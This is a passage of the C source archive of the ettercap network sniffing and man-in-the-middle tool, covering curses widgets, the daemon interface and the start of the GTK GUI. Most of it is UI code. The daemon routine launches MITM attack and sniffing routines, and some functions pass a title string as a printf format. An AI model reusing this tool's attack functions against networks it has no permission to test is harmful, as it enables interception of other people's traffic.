wdg_scroll_lost_focus; wo->get_msg = wdg_scroll_get_msg; WDG_SAFE_CALLOC(wo->extend, 1, sizeof(struct wdg_scroll)); } /* * called to destroy a window */ static int wdg_scroll_destroy(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_scroll, ww); WDG_DEBUG_MSG("wdg_scroll_destroy"); /* erase the window */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); wbkgd(ww->sub, COLOR_PAIR(wo->screen_color)); werase(ww->sub); werase(ww->win); wnoutrefresh(ww->win); /* dealloc the structures */ delwin(ww->sub); delwin(ww->win); WDG_SAFE_FREE(wo->extend); return WDG_E_SUCCESS; } /* * called to resize a window */ static int wdg_scroll_resize(struct wdg_object *wo) { wdg_scroll_redraw(wo); return WDG_E_SUCCESS; } /* * called to redraw a window */ static int wdg_scroll_redraw(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_scroll, ww); size_t c = wdg_get_ncols(wo); size_t l = wdg_get_nlines(wo); size_t x = wdg_get_begin_x(wo); size_t y = wdg_get_begin_y(wo); WDG_DEBUG_MSG("wdg_scroll_redraw"); /* the window already exist */ if (ww->win) { /* erase the border */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); werase(ww->win); touchwin(ww->win); wnoutrefresh(ww->win); /* resize the window and draw the new border */ mvwin(ww->win, y, x); wresize(ww->win, l, c); wdg_scroll_border(wo); /* set the window color */ wbkgd(ww->sub, COLOR_PAIR(wo->window_color)); touchwin(ww->sub); /* the pad is resized only orizzontally. * the vertical dimension can be larger than the screen */ wdg_scroll_set_lines(wo, ww->y_max); /* refresh it */ WDG_PAD_REFRESH(ww, c, l, x, y); /* the first time we have to allocate the window */ } else { /* a default value waiting for wdg_scroll_set_lines() */ ww->y_max = l * 5; /* create the outher window */ if ((ww->win = newwin(l, c, y, x)) == NULL) return -WDG_E_FATAL; /* draw the borders */ wdg_scroll_border(wo); /* initialize the pointer */ wdg_set_scroll(wo, ww->y_max - l + 1); /* create the inner (actual) window */ if ((ww->sub = newpad(ww->y_max, c - 2)) == NULL) return -WDG_E_FATAL; /* set the window color */ wbkgd(ww->sub, COLOR_PAIR(wo->window_color)); touchwin(ww->sub); /* move to the bottom of the pad */ wmove(ww->sub, ww->y_scroll + 1, 0); /* permit scroll in the pad */ scrollok(ww->sub, TRUE); } /* refresh the window */ touchwin(ww->sub); wnoutrefresh(ww->win); WDG_PAD_REFRESH(ww, c, l, x, y); wo->flags |= WDG_OBJ_VISIBLE; return WDG_E_SUCCESS; } /* * called when the window gets the focus */ static int wdg_scroll_get_focus(struct wdg_object *wo) { /* set the flag */ wo->flags |= WDG_OBJ_FOCUSED; /* redraw the window */ wdg_scroll_redraw(wo); return WDG_E_SUCCESS; } /* * called when the window looses the focus */ static int wdg_scroll_lost_focus(struct wdg_object *wo) { /* set the flag */ wo->flags &= ~WDG_OBJ_FOCUSED; /* redraw the window */ wdg_scroll_redraw(wo); return WDG_E_SUCCESS; } /* * called by the messages dispatcher when the window is focused */ static int wdg_scroll_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_scroll, ww); size_t c = wdg_get_ncols(wo); size_t l = wdg_get_nlines(wo); size_t x = wdg_get_begin_x(wo); size_t y = wdg_get_begin_y(wo); /* handle the message */ switch (key) { case KEY_MOUSE: /* is the mouse event within our edges ? */ if (wenclose(ww->win, mouse->y, mouse->x)) { /* get the focus only if it was not focused */ if (!(wo->flags & WDG_OBJ_FOCUSED)) wdg_set_focus(wo); if (mouse->x == x + c - 1 && (mouse->y >= y + 1 && mouse->y <= y + l - 1)) { wdg_mouse_scroll(wo, mouse->y); WDG_PAD_REFRESH(ww, c, l, x, y); wnoutrefresh(ww->win); } } else return -WDG_E_NOTHANDLED; break; /* handle scrolling of the pad */ case KEY_UP: wdg_set_scroll(wo, ww->y_scroll - 1); WDG_PAD_REFRESH(ww, c, l, x, y); wnoutrefresh(ww->win); break; case KEY_DOWN: wdg_set_scroll(wo, ww->y_scroll + 1); WDG_PAD_REFRESH(ww, c, l, x, y); wnoutrefresh(ww->win); break; case KEY_NPAGE: wdg_set_scroll(wo, ww->y_scroll + (l - 2)); WDG_PAD_REFRESH(ww, c, l, x, y); wnoutrefresh(ww->win); break; case KEY_PPAGE: wdg_set_scroll(wo, ww->y_scroll - (l - 2)); WDG_PAD_REFRESH(ww, c, l, x, y); wnoutrefresh(ww->win); break; /* message not handled */ default: return -WDG_E_NOTHANDLED; break; } return WDG_E_SUCCESS; } /* * draw the borders and title */ static void wdg_scroll_border(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_scroll, ww); size_t c = wdg_get_ncols(wo); /* the object was focused */ if (wo->flags & WDG_OBJ_FOCUSED) { wattron(ww->win, A_BOLD); wbkgdset(ww->win, COLOR_PAIR(wo->focus_color)); } else wbkgdset(ww->win, COLOR_PAIR(wo->border_color)); /* draw the borders */ box(ww->win, 0, 0); /* draw the elevator */ wdg_set_scroll(wo, ww->y_scroll); /* set the title color */ wbkgdset(ww->win, COLOR_PAIR(wo->title_color)); /* there is a title: print it */ if (wo->title) { switch (wo->align) { case WDG_ALIGN_LEFT: wmove(ww->win, 0, 3); break; case WDG_ALIGN_CENTER: wmove(ww->win, 0, (c - strlen(wo->title)) / 2); break; case WDG_ALIGN_RIGHT: wmove(ww->win, 0, c - strlen(wo->title) - 3); break; } wprintw(ww->win, wo->title); } /* restore the attribute */ if (wo->flags & WDG_OBJ_FOCUSED) { wattroff(ww->win, A_BOLD); wbkgdset(ww->win, COLOR_PAIR(wo->focus_color)); } else wbkgdset(ww->win, COLOR_PAIR(wo->border_color)); } /* * erase the subwindow */ void wdg_scroll_erase(wdg_t *wo) { WDG_WO_EXT(struct wdg_scroll, ww); size_t c = wdg_get_ncols(wo); size_t l = wdg_get_nlines(wo); size_t x = wdg_get_begin_x(wo); size_t y = wdg_get_begin_y(wo); werase(ww->sub); WDG_PAD_REFRESH(ww, c, l, x, y); } /* * print a string in the window */ void wdg_scroll_print(wdg_t *wo, int color, char *fmt, ...) { WDG_WO_EXT(struct wdg_scroll, ww); size_t c = wdg_get_ncols(wo); size_t l = wdg_get_nlines(wo); size_t x = wdg_get_begin_x(wo); size_t y = wdg_get_begin_y(wo); va_list ap; WDG_DEBUG_MSG("wdg_scroll_print"); /* move to the bottom of the pad */ wdg_set_scroll(wo, ww->y_max - l + 1); wbkgdset(ww->sub, COLOR_PAIR(color)); /* print the message */ va_start(ap, fmt); vw_printw(ww->sub, fmt, ap); va_end(ap); wbkgdset(ww->sub, COLOR_PAIR(wo->window_color)); WDG_PAD_REFRESH(ww, c, l, x, y); } /* * set the dimension of the pad */ void wdg_scroll_set_lines(wdg_t *wo, size_t lines) { WDG_WO_EXT(struct wdg_scroll, ww); size_t c = wdg_get_ncols(wo); size_t l = wdg_get_nlines(wo); size_t oldlines = ww->y_max; WDG_DEBUG_MSG("wdg_scroll_set_lines"); /* resize the pad */ wresize(ww->sub, lines, c - 2); /* do the proper adjustements to the scroller */ ww->y_max = lines; wdg_set_scroll(wo, ww->y_max - l + 1); /* adjust only the first time (when the user requests the change) */ if (oldlines != lines) wmove(ww->sub, ww->y_scroll + 1, 0); } /* * set the scroll pointer and redraw * the window elevator */ static void wdg_set_scroll(struct wdg_object *wo, int s) { WDG_WO_EXT(struct wdg_scroll, ww); size_t c = wdg_get_ncols(wo); size_t l = wdg_get_nlines(wo); int min = 0; int max = ww->y_max - l + 1; size_t height, vpos; /* don't go above max and below min */ if (s < min) s = min; if (s > max) s = max; ww->y_scroll = s; /* compute the scroller cohordinates */ height = (l - 2) * (l - 2) / ww->y_max; vpos = l * ww->y_scroll / ww->y_max; height = (height < 1) ? 1 : height; vpos = (vpos == 0) ? 1 : vpos; vpos = (vpos > (l - 1) - height) ? (l - 1) - height : vpos; /* hack to make sure to hit the bottom */ if (ww->y_scroll == (size_t)max) vpos = l - 1 - height; /* draw the scroller */ wmove(ww->win, 1, c - 1); wvline(ww->win, ACS_CKBOARD, l - 2); wattron(ww->win, A_REVERSE); wmove(ww->win, vpos, c - 1); wvline(ww->win, ACS_DIAMOND, height); wattroff(ww->win, A_REVERSE); } /* * jump to a scroll position with the mouse */ static void wdg_mouse_scroll(struct wdg_object *wo, int s) { WDG_WO_EXT(struct wdg_scroll, ww); size_t l = wdg_get_nlines(wo); size_t y = wdg_get_begin_y(wo); size_t base; /* calculate the relative displacement */ base = s - y - 1; /* special case for top and bottom */ if (base == 0) s = 0; else if (base == l - 3) s = ww->y_max - l + 1; /* else calulate the proportion */ else s = base * ww->y_max / (l - 2); /* set the scroller */ wdg_set_scroll(wo, s); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/curses/widgets/wdg_window.c000664 000000 000000 00000015304 13711276346 023665 0ustar00rootroot000000 000000 /* WDG -- window widget Copyright (C) ALoR This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include /* GLOBALS */ struct wdg_window { WINDOW *win; WINDOW *sub; }; /* PROTOS */ void wdg_create_window(struct wdg_object *wo); static int wdg_window_destroy(struct wdg_object *wo); static int wdg_window_resize(struct wdg_object *wo); static int wdg_window_redraw(struct wdg_object *wo); static int wdg_window_get_focus(struct wdg_object *wo); static int wdg_window_lost_focus(struct wdg_object *wo); static int wdg_window_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse); static void wdg_window_border(struct wdg_object *wo); /*******************************************/ /* * called to create a window */ void wdg_create_window(struct wdg_object *wo) { WDG_DEBUG_MSG("wdg_create_window"); /* set the callbacks */ wo->destroy = wdg_window_destroy; wo->resize = wdg_window_resize; wo->redraw = wdg_window_redraw; wo->get_focus = wdg_window_get_focus; wo->lost_focus = wdg_window_lost_focus; wo->get_msg = wdg_window_get_msg; WDG_SAFE_CALLOC(wo->extend, 1, sizeof(struct wdg_window)); } /* * called to destroy a window */ static int wdg_window_destroy(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_window, ww); WDG_DEBUG_MSG("wdg_window_destroy (%p)", wo); /* erase the window */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); wbkgd(ww->sub, COLOR_PAIR(wo->screen_color)); werase(ww->sub); werase(ww->win); wnoutrefresh(ww->sub); wnoutrefresh(ww->win); /* dealloc the structures */ delwin(ww->sub); delwin(ww->win); WDG_SAFE_FREE(wo->extend); return WDG_E_SUCCESS; } /* * called to resize a window */ static int wdg_window_resize(struct wdg_object *wo) { wdg_window_redraw(wo); return WDG_E_SUCCESS; } /* * called to redraw a window */ static int wdg_window_redraw(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_window, ww); size_t c = wdg_get_ncols(wo); size_t l = wdg_get_nlines(wo); size_t x = wdg_get_begin_x(wo); size_t y = wdg_get_begin_y(wo); WDG_DEBUG_MSG("wdg_window_redraw"); /* the window already exist */ if (ww->win) { /* erase the border */ wbkgd(ww->win, COLOR_PAIR(wo->screen_color)); werase(ww->win); touchwin(ww->win); wnoutrefresh(ww->win); /* resize the window and draw the new border */ mvwin(ww->win, y, x); wresize(ww->win, l, c); wdg_window_border(wo); /* resize the actual window and touch it */ mvwin(ww->sub, y + 1, x + 1); wresize(ww->sub, l - 2, c - 2); /* set the window color */ wbkgd(ww->sub, COLOR_PAIR(wo->window_color)); /* the first time we have to allocate the window */ } else { /* create the outher window */ if ((ww->win = newwin(l, c, y, x)) == NULL) return -WDG_E_FATAL; /* draw the borders */ wdg_window_border(wo); /* create the inner (actual) window */ if ((ww->sub = newwin(l - 2, c - 2, y + 1, x + 1)) == NULL) return -WDG_E_FATAL; /* set the window color */ wbkgd(ww->sub, COLOR_PAIR(wo->window_color)); werase(ww->sub); redrawwin(ww->sub); /* initialize the pointer */ wmove(ww->sub, 0, 0); scrollok(ww->sub, TRUE); } /* refresh the window */ redrawwin(ww->sub); redrawwin(ww->win); wnoutrefresh(ww->win); wnoutrefresh(ww->sub); wo->flags |= WDG_OBJ_VISIBLE; return WDG_E_SUCCESS; } /* * called when the window gets the focus */ static int wdg_window_get_focus(struct wdg_object *wo) { /* set the flag */ wo->flags |= WDG_OBJ_FOCUSED; /* redraw the window */ wdg_window_redraw(wo); return WDG_E_SUCCESS; } /* * called when the window looses the focus */ static int wdg_window_lost_focus(struct wdg_object *wo) { /* set the flag */ wo->flags &= ~WDG_OBJ_FOCUSED; /* redraw the window */ wdg_window_redraw(wo); return WDG_E_SUCCESS; } /* * called by the messages dispatcher when the window is focused */ static int wdg_window_get_msg(struct wdg_object *wo, int key, struct wdg_mouse_event *mouse) { WDG_WO_EXT(struct wdg_window, ww); /* handle the message */ switch (key) { case KEY_MOUSE: /* is the mouse event within our edges ? */ if (wenclose(ww->win, mouse->y, mouse->x)) wdg_set_focus(wo); else return -WDG_E_NOTHANDLED; break; /* message not handled */ default: return -WDG_E_NOTHANDLED; break; } return WDG_E_SUCCESS; } /* * draw the borders and title */ static void wdg_window_border(struct wdg_object *wo) { WDG_WO_EXT(struct wdg_window, ww); size_t c = wdg_get_ncols(wo); /* the object was focused */ if (wo->flags & WDG_OBJ_FOCUSED) { wattron(ww->win, A_BOLD); wbkgdset(ww->win, COLOR_PAIR(wo->focus_color)); } else wbkgdset(ww->win, COLOR_PAIR(wo->border_color)); /* draw the borders */ box(ww->win, 0, 0); /* set the title color */ wbkgdset(ww->win, COLOR_PAIR(wo->title_color)); /* there is a title: print it */ if (wo->title) { switch (wo->align) { case WDG_ALIGN_LEFT: wmove(ww->win, 0, 3); break; case WDG_ALIGN_CENTER: wmove(ww->win, 0, (c - strlen(wo->title)) / 2); break; case WDG_ALIGN_RIGHT: wmove(ww->win, 0, c - strlen(wo->title) - 3); break; } wprintw(ww->win, wo->title); } /* restore the attribute */ if (wo->flags & WDG_OBJ_FOCUSED) wattroff(ww->win, A_BOLD); } /* * print a string in the window */ void wdg_window_print(wdg_t *wo, size_t x, size_t y, char *fmt, ...) { WDG_WO_EXT(struct wdg_window, ww); va_list ap; /* move the pointer */ wmove(ww->sub, y, x); /* print the message */ va_start(ap, fmt); vw_printw(ww->sub, fmt, ap); va_end(ap); wnoutrefresh(ww->sub); } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/daemon/000775 000000 000000 00000000000 13711276346 017637 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/interfaces/daemon/ec_daemon.c000664 000000 000000 00000012406 13711276346 021720 0ustar00rootroot000000 000000 /* ettercap -- daemonization (no GUI) Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include #include #include #include #include /* globals */ static int fd; /* proto */ void daemon_interface(void); static void daemon_init(void); static void daemon_cleanup(void); static void daemon_msg(const char *msg); static void daemon_error(const char *msg); static int daemon_progress(char *title, int value, int max); static void daemonize(void); /*******************************************/ void set_daemon_interface(void) { struct ui_ops ops; ops.init = &daemon_init; ops.start = &daemon_interface; ops.cleanup = &daemon_cleanup; ops.msg = &daemon_msg; ops.error = &daemon_error; ops.fatal_error = &daemon_error; ops.progress = &daemon_progress; ops.type = UI_DAEMONIZE; ui_register(&ops); } /* * initialization */ static void daemon_init(void) { fd = open("./ettercap_demonized.log", O_CREAT|O_TRUNC|O_WRONLY, 0600); ON_ERROR(fd, -1, "Can't open daemon log file"); /* daemonize ettercap */ daemonize(); } /* * open a file and dup2 it to in, out and err. * * in this way the user can track errors verified during * daemonization */ static void daemon_cleanup(void) { /* redirect in, out and err to fd */ dup2(fd, STDIN_FILENO); dup2(fd, STDOUT_FILENO); dup2(fd, STDERR_FILENO); fprintf(stdout, "\nettercap errors during daemonization are reported below:\n\n"); } /* * implement the progress bar (none for daemon) */ static int daemon_progress(char *title, int value, int max) { /* variable not used */ (void) title; if (value == max) return UI_PROGRESS_FINISHED; else return UI_PROGRESS_UPDATED; } /* discard the messages */ static void daemon_msg(const char *msg) { DEBUG_MSG("daemon_msg: %s", msg); return; } /* print the message in the log */ static void daemon_error(const char *msg) { DEBUG_MSG("daemon_error: %s", msg); /* open the exit log file */ daemon_cleanup(); fprintf(stdout, "%s\n", msg); return; } /* the interface */ void daemon_interface(void) { DEBUG_MSG("daemon_interface"); struct plugin_list *plugin, *tmp; LIST_FOREACH_SAFE(plugin, &EC_GBL_OPTIONS->plugins, next, tmp) { /* check if the plugin exists */ if (search_plugin(plugin->name) != E_SUCCESS) plugin->exists = false; USER_MSG("Sorry, plugin '%s' can not be found - skipping!\n\n", plugin->name); } /* build the list of active hosts */ build_hosts_list(); /* start the mitm attack */ mitm_start(); /* initialize the sniffing method */ EXECUTE(EC_GBL_SNIFF->start); /* if we have to activate a plugin */ LIST_FOREACH_SAFE(plugin, &EC_GBL_OPTIONS->plugins, next, tmp) { if (plugin->exists && plugin_init(plugin->name) != PLUGIN_RUNNING) /* skip plugin */ USER_MSG("Plugin '%s' can not be started - skipping!\n\n", plugin->name); } /* discard the messages */ LOOP { CANCELLATION_POINT(); ec_usleep(SEC2MICRO(1)); ui_msg_flush(MSG_ALL); } /* NOT REACHED */ } /* * set the terminal as non blocking */ static void daemonize(void) { #ifdef HAVE_DAEMON int ret; DEBUG_MSG("daemonize: (daemon)"); fprintf(stdout, "Daemonizing %s...\n\n", EC_GBL_PROGRAM); /* * daemonze the process. * keep the current directory * close stdin, out and err */ ret = daemon(1, 0); ON_ERROR(ret, -1, "Can't demonize %s", EC_GBL_PROGRAM); #else pid_t pid; DEBUG_MSG("daemonize: (manual)"); fprintf(stdout, "Daemonizing %s...\n\n", EC_GBL_PROGRAM); if((signal(SIGTTOU, SIG_IGN)) == SIG_ERR) ERROR_MSG("signal()"); if((signal(SIGTTIN, SIG_IGN)) == SIG_ERR) ERROR_MSG("signal()"); if((signal(SIGTSTP, SIG_IGN)) == SIG_ERR) ERROR_MSG("signal()"); if((signal(SIGHUP, SIG_IGN)) == SIG_ERR) ERROR_MSG("signal()"); pid = fork(); if( pid < 0) ERROR_MSG("fork()"); /* kill the father and detach the son */ if ( pid != 0) _exit(0); if(setsid() == -1) ERROR_MSG("setsid(): cannot set the session id"); fd = open("/dev/null", O_RDWR); ON_ERROR(fd, -1, "Can't open /dev/null"); /* redirect in, out and err to /dev/null */ dup2(fd, STDIN_FILENO); dup2(fd, STDOUT_FILENO); dup2(fd, STDERR_FILENO); close(fd); #endif } /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/daemon/ec_daemon.h000664 000000 000000 00000000527 13711276346 021726 0ustar00rootroot000000 000000 #ifndef EC_DAEMON_H #define EC_DAEMON_H #include #include #include #include #include #include #include #include #include #include /* proto */ extern void set_daemon_interface(void); #endif /* EOF */ // vim:ts=3:expandtab ettercap-0.8.3.1/src/interfaces/gtk/000775 000000 000000 00000000000 13711276346 017161 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/interfaces/gtk/ec_gtk.c000664 000000 000000 00000153005 13711276346 020565 0ustar00rootroot000000 000000 /* ettercap -- GTK+ GUI Copyright (C) ALoR & NaGA This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ #include #include #include #include #include #include /* \Device\NPF{...} and description are huge. There should be 2 buffers * for this; one for dev-name and 1 for description. Note: dev->description * on WinPcap can contain and newlines! */ #define IFACE_LEN 100 /* globals */ GtkWidget *window = NULL; /* main window */ GtkWidget *notebook = NULL; GtkWidget *main_menu = NULL; GtkUIManager *menu_manager = NULL; guint merge_id; GTimer *progress_timer = NULL; static GtkWidget *notebook_frame = NULL; static GtkWidget *textview = NULL; static GtkTextBuffer *msgbuffer = NULL; static GtkTextMark *endmark = NULL; static GtkAccelGroup *accel_group = NULL; static gboolean progress_canceled = FALSE; static GtkWidget *progress_dialog = NULL; static GtkWidget *progress_bar = NULL; /* proto */ void gtkui_start(void); static void gtkui_init(void); static void gtkui_cleanup(void); static void gtkui_update(int target); static void gtkui_msg(const char *msg); static void gtkui_error(const char *msg); static void gtkui_fatal_error(const char *msg); static gboolean gtkui_flush_msg(gpointer data); static void gtkui_progress(char *title, int value, int max); static void gtkui_setup(void); static void toggle_unoffensive(void); static void toggle_nopromisc(void); static void gtkui_file_open(void); static void read_pcapfile(gchar *file); static void gtkui_file_write(void); static void write_pcapfile(void); static void gtkui_unified_sniff(void); static void gtkui_unified_sniff_default(void); static void gtkui_bridged_sniff(void); static void bridged_sniff(void); static void gtkui_pcap_filter(void); static void gtkui_set_netmask(void); static gboolean gtkui_progress_cancel(GtkWidget *window, gpointer data); #if GTK_MINOR_VERSION == 2 static void gtkui_page_defocus_tabs(void); #endif /* wrapper functions which inject the real function call into the main * idle loop, ensugin only th emain thread performs GTK operations */ static gboolean gtkui_cleanup_shim(gpointer data) { /* variable not used */ (void) data; gtkui_cleanup(); return FALSE; } static void gtkui_cleanup_wrap(void) { g_idle_add(gtkui_cleanup_shim, NULL); } static gboolean gtkui_msg_shim(gpointer data) { gtkui_msg(data); SAFE_FREE(data); return FALSE; } static void gtkui_msg_wrap(const char *msg) { char *copy = strdup(msg); if (msg) { g_idle_add(gtkui_msg_shim, copy); } else { FATAL_ERROR("out of memory"); } } static gboolean gtkui_error_shim(gpointer data) { gtkui_error(data); SAFE_FREE(data); return FALSE; } static void gtkui_error_wrap(const char *msg) { char *copy = strdup(msg); if (msg) { g_idle_add(gtkui_error_shim, copy); } else { FATAL_ERROR("out of memory"); } } static gboolean gtkui_fatal_error_shim(gpointer data) { gtkui_fatal_error(data); SAFE_FREE(data); return FALSE; } static void gtkui_fatal_error_wrap(const char *msg) { char *copy = strdup(msg); if (msg) { gtkui_fatal_error_shim(copy); //g_idle_add(gtkui_fatal_error_shim, copy); } else { FATAL_ERROR("out of memory"); } } struct gtkui_input_data { char *title; char *input; size_t n; void (*callback)(void); }; struct gtkui_progress_data { char *title; int value; int max; }; static gboolean gtkui_progress_shim(gpointer data) { struct gtkui_progress_data *gpd = data; gdouble delay; gulong usec; delay = g_timer_elapsed(progress_timer, &usec); delay += usec / 1000000; /* render progress bar if not canceled or lasting longer than 750 ms */ if (!progress_canceled && delay >= 0.75) gtkui_progress(gpd->title, gpd->value, gpd->max); SAFE_FREE(gpd->title); SAFE_FREE(gpd); return FALSE; } static int gtkui_progress_wrap(char *title, int value, int max) { struct gtkui_progress_data *gpd; if (value <= 1) { g_timer_start(progress_timer); progress_canceled = FALSE; } if (progress_canceled == TRUE) { return UI_PROGRESS_INTERRUPTED; } if (!title) { return UI_PROGRESS_UPDATED; } gpd = malloc(sizeof *gpd); if (gpd) { gpd->title = strdup(title); gpd->value = value; gpd->max = max; g_idle_add(gtkui_progress_shim, gpd); } else { FATAL_ERROR("out of memory"); } return value == max ? UI_PROGRESS_FINISHED : UI_PROGRESS_UPDATED; } /***#****************************************/ void set_gtk_interface(void) { struct ui_ops ops; /* wipe the struct */ memset(&ops, 0, sizeof(ops)); /* register the functions */ ops.init = >kui_init; ops.start = >kui_start; ops.type = UI_GTK; ops.cleanup = >kui_cleanup_wrap; ops.msg = >kui_msg_wrap; ops.error = >kui_error_wrap; ops.fatal_error = >kui_fatal_error_wrap; ops.input = >kui_input; ops.progress = >kui_progress_wrap; ops.update = >kui_update; ui_register(&ops); DEBUG_MSG("GTK -> gtk+ %d.%d.%d\n", gtk_major_version, gtk_minor_version, gtk_micro_version); } /* * prepare GTK, create the menu/messages window, enter the first loop */ static void gtkui_init(void) { DEBUG_MSG("gtk_init"); // g_thread_init has been deprecated since version 2.32 and should not be used in newly-written code. This function is no longer necessary. The GLib threading system is automatically initialized at the start of your program. #if !(GLIB_CHECK_VERSION(2,32,0)) g_thread_init(NULL); #endif if(!gtk_init_check(0, NULL)) { FATAL_ERROR("GTK+ failed to initialize. Is X running?"); return; } gtkui_conf_read(); gtkui_setup(); /* initialize timer */ progress_timer = g_timer_new(); /* gui init loop, calling gtk_main_quit will cause * this to exit so we can proceed to the main loop * later. */ gtk_main(); /* remove the keyboard shortcuts for the setup menus */ gtk_window_remove_accel_group(GTK_WINDOW (window), accel_group); EC_GBL_UI->initialized = 1; } /* * exit ettercap */ void gtkui_exit(void) { int left, top, width, height; DEBUG_MSG("gtkui_exit"); g_timer_destroy(progress_timer); gtk_window_get_position(GTK_WINDOW (window), &left, &top); gtk_window_get_size(GTK_WINDOW (window), &width, &height); gtkui_conf_set("window_left", left); gtkui_conf_set("window_top", top); gtkui_conf_set("window_width", width); gtkui_conf_set("window_height", height); gtk_main_quit(); gtkui_conf_save(); clean_exit(0); } /* * reset to the previous state */ static void gtkui_cleanup(void) { DEBUG_MSG("gtk_cleanup"); } /* * process an UI update notification */ static void gtkui_update(int target) { switch (target) { case UI_UPDATE_HOSTLIST: g_idle_add((GSourceFunc)gtkui_refresh_host_list, NULL); break; case UI_UPDATE_PLUGINLIST: g_idle_add((GSourceFunc)gtkui_refresh_plugin_list, NULL); break; } } /* * print a USER_MSG() extracting it from the queue */ static void gtkui_msg(const char *msg) { GtkTextIter iter; gchar *unicode = NULL; DEBUG_MSG("gtkui_msg: %s", msg); if((unicode = gtkui_utf8_validate((char *)msg)) == NULL) return; gtk_text_buffer_get_end_iter(msgbuffer, &iter); gtk_text_buffer_insert(msgbuffer, &iter, unicode, -1); gtk_text_view_scroll_to_mark(GTK_TEXT_VIEW (textview), endmark, 0, FALSE, 0, 0); return; } /* flush pending messages */ gboolean gtkui_flush_msg(gpointer data) { /* variable not used */ (void) data; ui_msg_flush(MSG_ALL); return(TRUE); } /* * display about dialog */ void gtkui_about(void) { GtkWidget *dialog, *notebook, *content, *scroll, *vbox, *logo, *label; GtkWidget *button, *textview; GtkTextBuffer *textbuf; GtkTextIter iter; GError *error = NULL; const gchar *path, *unicode; gchar *license, *authors; gsize length; dialog = gtk_dialog_new(); gtk_window_set_title(GTK_WINDOW(dialog), "About"); gtk_window_set_modal(GTK_WINDOW(dialog), TRUE); gtk_window_set_transient_for(GTK_WINDOW(dialog), GTK_WINDOW(window)); gtk_window_set_position(GTK_WINDOW(dialog), GTK_WIN_POS_CENTER_ON_PARENT); gtk_window_set_default_size(GTK_WINDOW(dialog), 450, 300); button = gtk_dialog_add_button(GTK_DIALOG(dialog), "Close", GTK_RESPONSE_CLOSE); gtk_button_set_image(GTK_BUTTON(button), gtk_image_new_from_stock(GTK_STOCK_CLOSE, GTK_ICON_SIZE_BUTTON)); notebook = gtk_notebook_new(); /* General page */ vbox = gtkui_box_new(GTK_ORIENTATION_VERTICAL, 10, FALSE); path = INSTALL_DATADIR "/" PROGRAM "/" LOGO_FILE_SMALL; if(g_file_test(path, G_FILE_TEST_EXISTS)) logo = gtk_image_new_from_file(path); else /* if neither path is valid gtk will use a broken image icon */ logo = gtk_image_new_from_file("./share/" LOGO_FILE_SMALL); gtk_box_pack_start(GTK_BOX(vbox), logo, FALSE, FALSE, 0); label = gtk_label_new(""); gtk_label_set_markup(GTK_LABEL(label), "" PROGRAM " " EC_VERSION ""); gtk_box_pack_start(GTK_BOX(vbox), label, FALSE, FALSE, 0); label = gtk_label_new("www.ettercap-project.org"); gtk_label_set_selectable(GTK_LABEL(label), TRUE); gtk_box_pack_start(GTK_BOX(vbox), label, FALSE, FALSE, 0); gtk_notebook_append_page(GTK_NOTEBOOK(notebook), vbox, gtk_label_new("General")); /* Authors page */ scroll= gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scroll), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); gtk_scrolled_window_set_shadow_type(GTK_SCROLLED_WINDOW (scroll), GTK_SHADOW_IN); /* load the authors file */ g_file_get_contents("./AUTHORS", &authors, &length, &error); if (error != NULL) { /* no debug message */ g_error_free(error); error = NULL; /* 2nd try */ g_file_get_contents(INSTALL_DATADIR "/" PROGRAM "/AUTHORS", &authors, &length, &error); if (error != NULL) { DEBUG_MSG("failed to load authors file: %s", error->message); gtkui_error("Failed to load AUTHORS file."); g_error_free(error); error = NULL; } } textview = gtk_text_view_new(); gtk_text_view_set_editable(GTK_TEXT_VIEW(textview), FALSE); textbuf = gtk_text_view_get_buffer(GTK_TEXT_VIEW(textview)); if (authors && (unicode = gtkui_utf8_validate(authors)) != NULL) { gtk_text_buffer_get_end_iter(textbuf, &iter); gtk_text_buffer_insert(textbuf, &iter, unicode, -1); } gtk_container_add(GTK_CONTAINER(scroll), textview); gtk_notebook_append_page(GTK_NOTEBOOK(notebook), scroll, gtk_label_new("Authors")); /* License page */ scroll= gtk_scrolled_window_new(NULL, NULL); gtk_scrolled_window_set_policy(GTK_SCROLLED_WINDOW (scroll), GTK_POLICY_AUTOMATIC, GTK_POLICY_AUTOMATIC); 